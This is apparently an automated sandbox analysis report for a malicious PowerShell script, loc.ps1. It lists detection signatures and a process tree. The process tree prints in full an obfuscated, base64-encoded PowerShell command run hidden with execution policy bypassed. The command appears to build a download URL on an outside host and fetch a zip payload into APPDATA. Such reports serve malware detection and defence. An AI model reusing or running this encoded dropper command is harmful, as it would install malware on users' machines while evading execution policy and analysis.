Edit tour
Windows
Analysis Report
loc.ps1
Overview
General Information
Detection
Score: | 64 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Very long command line found
Potential dropper URLs found in powershell memory
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Creates a process in suspended mode (likely to inject code)
Contains long sleeps (>= 3 min)
Enables debug privileges
Classification
- System is w10x64
- powershell.exe (PID: 6560 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe" - noLogo -Ex ecutionPol icy unrest ricted -fi le "C:\Use rs\user\De sktop\loc. ps1 MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 6424 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 6868 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -nop -ep b ypass -win hid -enc LgAoACcAYw BkACcAKQAg ACQAewBFAG AATgBWADoA YQBwAGAAcA BgAEQAQQB0 AGEAfQA7AC AAJAB7AEwA YABpAG4ASw B9AD0AKAAi AHsAMAB9AH sAMQB9AHsA NQB9AHsANg B9AHsANwB9 AHsANAB9AH sAOAB9AHsA MgB9AHsAMw B9ACIAIAAt AGYAIAAnAG gAdAAnACwA JwB0AHAAcw A6ACcALAAn AHcALgAnAC wAJwBwAGgA cAAnACwAJw ByAG0AcwAv ACcALAAnAC 8ALwB1AHMA aABlAHIAcw BrAGUAJwAs ACcAbgB5AG EALgBjAG8A LgBrAGUAJw AsACcALwBm AG8AJwAsAC cAdgBpAGUA JwApADsAIA AkAHsAUgBu AGAAVQBtAH 0APQAuACgA IgB7ADEAfQ B7ADIAfQB7 ADAAfQAiAC 0AZgAnAFIA YQBuAGQAbw BtACcALAAn AEcAZQAnAC wAJwB0AC0A JwApACAALQ BtAGkAbgBp AG0AdQBtAC AANQAgAC0A bQBhAHgAaQ BtAHUAbQAg ADkAOwAgAC QAewBSAFIA bgBgAFUATQ B9AD0ALgAo ACIAewAxAH 0AewAyAH0A ewAwAH0AIg AtAGYAIAAn AFIAYQBuAG QAbwBtACcA LAAnAEcAZQ AnACwAJwB0 AC0AJwApAC AALQBtAGkA bgBpAG0AdQ BtACAAMQAw ADIANAAgAC 0AbQBhAHgA aQBtAHUAbQ AgADkAOQA5 ADkAOwAgAC QAewBDAEgA YABSAFMAfQ A9ACgAIgB7 ADkAfQB7AD cAfQB7ADUA fQB7ADAAfQ B7ADQAfQB7 ADEAMAB9AH sAMwB9AHsA NgB9AHsAMQ B9AHsAMgB9 AHsAOAB9AC IAIAAtAGYA JwBwAHMAJw AsACcAWAAn ACwAJwBZAC cALAAnAEoA JwAsACcAdA B1AHYAdwB4 ACcALAAnAG 4AbwAnACwA JwBLAEwATQ BOAE8AUABS AFMAVABVAF YAVwAnACwA JwBtACcALA AnAFoAJwAs ACcAYQBiAG MAZABlAGYA ZwBoAGkAag BrAGwAJwAs ACcAeQB6AE EAQgBDAEQA RQBGAEcASA BJACcAKQA7 ACAAJAB7AH IAYABTAHQA UgB9AD0AJw AnADsAIAAk AHsAUgBgAE EATgB9AD0A JgAoACIAew AzAH0AewAy AH0AewAxAH 0AewAwAH0A IgAtAGYAIA AnAGMAdAAn ACwAJwBlAC cALAAnAGoA JwAsACcATg BlAHcALQBP AGIAJwApAC AAKAAiAHsA MAB9AHsAMg B9AHsAMQB9 AHsAMwB9AC IALQBmACAA JwBTAHkAJw AsACcAZQBt AC4AUgBhAG 4AZABvACcA LAAnAHMAdA AnACwAJwBt ACcAKQA7AC AAZgBvAHIA IAAoACQAew BJAH0APQAw ADsAIAAkAH sASQB9ACAA LQBsAHQAIA AkAHsAcgBg AE4AVQBtAH 0AOwAgACQA ewBpAH0AKw ArACkAIAB7 ACQAewByAF MAYABUAHIA fQArAD0AJA B7AEMAaABg AFIAUwB9AF sAJAB7AFIA YABBAG4AfQ AuACgAIgB7 ADEAfQB7AD AAfQAiACAA LQBmACAAJw B0ACcALAAn AG4AZQB4AC cAKQAuAEkA bgB2AG8Aaw BlACgAMAAs ACAAJAB7AG MAYABIAFIA UwB9AC4AIg BMAGAARQBu AEcAdABIAC IAKQBdAH0A OwAgACQAew BSAFoAYABJ AHAAfQA9AC QAewByAGAA cwB0AFIAfQ ArACgAIgB7 ADEAfQB7AD AAfQAiAC0A ZgAnAHAAJw AsACcALgB6 AGkAJwApAD sAIAAkAHsA UABBAGAAVA BoAH0APQAk AHsAZQBuAG AAVgBgADoA YQBQAFAAZA BhAHQAYQB9 ACsAJwBcAC cAKwAkAHsA cgBaAGAAaQ BwAH0AOwAg ACQAewBQAG AAegBJAHAA fQA9ACQAew BFAE4AVgA6 AGEAYABwAG AAcABkAGEA dABBAH0AKw AoACgAKAAi AHsAMAB9AH sAMQB9AHsA MgB9ACIAIA AtAGYAJwB7 ADAAfQAnAC wAJwBPAE4A RQBOADAAVA BFACcALAAn AHUAcABkAG EAdABlAF8A JwApACkAIA AtAGYAWwBj AEgAQQByAF 0AOQAyACkA KwAkAHsAUg BSAG4AYABV AG0AfQA7AC AAJgAoACIA ewAyAH0Aew AzAH0AewAx AH0AewA0AH 0AewA1AH0A ewAwAH0AIg AgAC0AZgAg ACcAcgAnAC wAJwBuACcA LAAnAFMAdA BhAHIAdAAt AEIAJwAsAC cAaQB0AHMA VAByAGEAJw AsACcAcwAn ACwAJwBmAG UAJwApACAA LQBTAG8AdQ ByAGMAZQAg